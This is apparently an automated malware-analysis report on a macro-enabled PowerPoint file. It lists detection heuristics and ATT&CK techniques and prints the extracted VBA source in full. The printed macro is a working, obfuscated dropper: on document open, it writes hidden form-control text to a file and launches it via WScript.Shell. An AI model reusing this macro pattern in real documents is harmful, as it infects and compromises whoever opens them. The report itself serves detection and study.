MALICIOUS
260
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1203 Exploitation for Client Execution
The sample contains a VBA macro with an Auto_Open subroutine that utilizes WScript.Shell to execute a command. The script appears to be designed to download and execute a second-stage payload, as indicated by the use of CreateObject and Shell() calls. The reconstructed command `C:\Windows\Explorer ` suggests an attempt to launch an executable.
Heuristics 6
-
VBA project inside OOXML medium 5 related findings OOXML_VBADocument contains a VBA project — VBA macros present
-
Shell() call in VBA critical OLE_VBA_SHELLShell() call in VBA
-
WScript.Shell usage critical OLE_VBA_WSCRIPTWScript.Shell usage
-
Auto_Open macro high OLE_VBA_AUTOAuto_Open macro
-
CreateObject call high OLE_VBA_CREATEOBJCreateObject call
-
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
Extracted artifacts 2
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source from OOXML) | 1562 bytes |
SHA-256: 43e472696ec865a47c4a7a9d14b5c0abc0ef8c0262887703c18954a5f1bbc746 |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "yPdchTc"
Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = False
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Public Function gMNytCb(PabdIqp)
gMNytCb = Replace(PabdIqp, "%c9J1Laj%bjnMvc]<J-|PbIO=@|8j6", "")
End Function
Sub yHsDpTy()
Dim PoYDTNL As String: PoYDTNL = mjuSoOj.rSaqAYW.Tag
Dim TWCyETd As String: TWCyETd = gMNytCb(PoYDTNL)
Open TWCyETd For Output As #1
Dim MmfxxoS As String: MmfxxoS = mjuSoOj.rSaqAYW.ControlTipText
Dim faxOIXd As String: faxOIXd = gMNytCb(MmfxxoS)
Print #1, faxOIXd
Close
On Error Resume Next
AppActivate "Microsoft PowerPoint Services..."
If Err <> 0 Then
Err = 0
Set TvHjAUX = CreateObject("WScript.Shell")
Set odbxrqw = TvHjAUX.exEc("C:\Windows\Explorer " & TWCyETd)
If Err <> 0 Then MsgBox "Can't Stop "
End If
End Sub
Attribute VB_Name = "TyPoiyV"
Public Sub aUtO_oPeN()
EAzroyE.uFeWfed
End Sub
Attribute VB_Name = "mjuSoOj"
Attribute VB_Base = "0{633B3255-65CF-4E0A-AA89-135CD7490F0A}{F7DAC83B-376C-4B6D-941E-D65214E8C7D8}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Attribute VB_Name = "EAzroyE"
Public nbgdNoZ As New yPdchTc
Sub uFeWfed()
nbgdNoZ.yHsDpTy
End Sub
|
|||
vbaProject_00.bin |
vba-project | OOXML VBA project: ppt/vbaProject.bin | 36864 bytes |
SHA-256: e5884278eda5a32d41f2af4240c3a31bbe3cec3ed84a8ddedb242515f2e7169b |
|||
Open this report in the interactive analyzer, or submit your own file for analysis.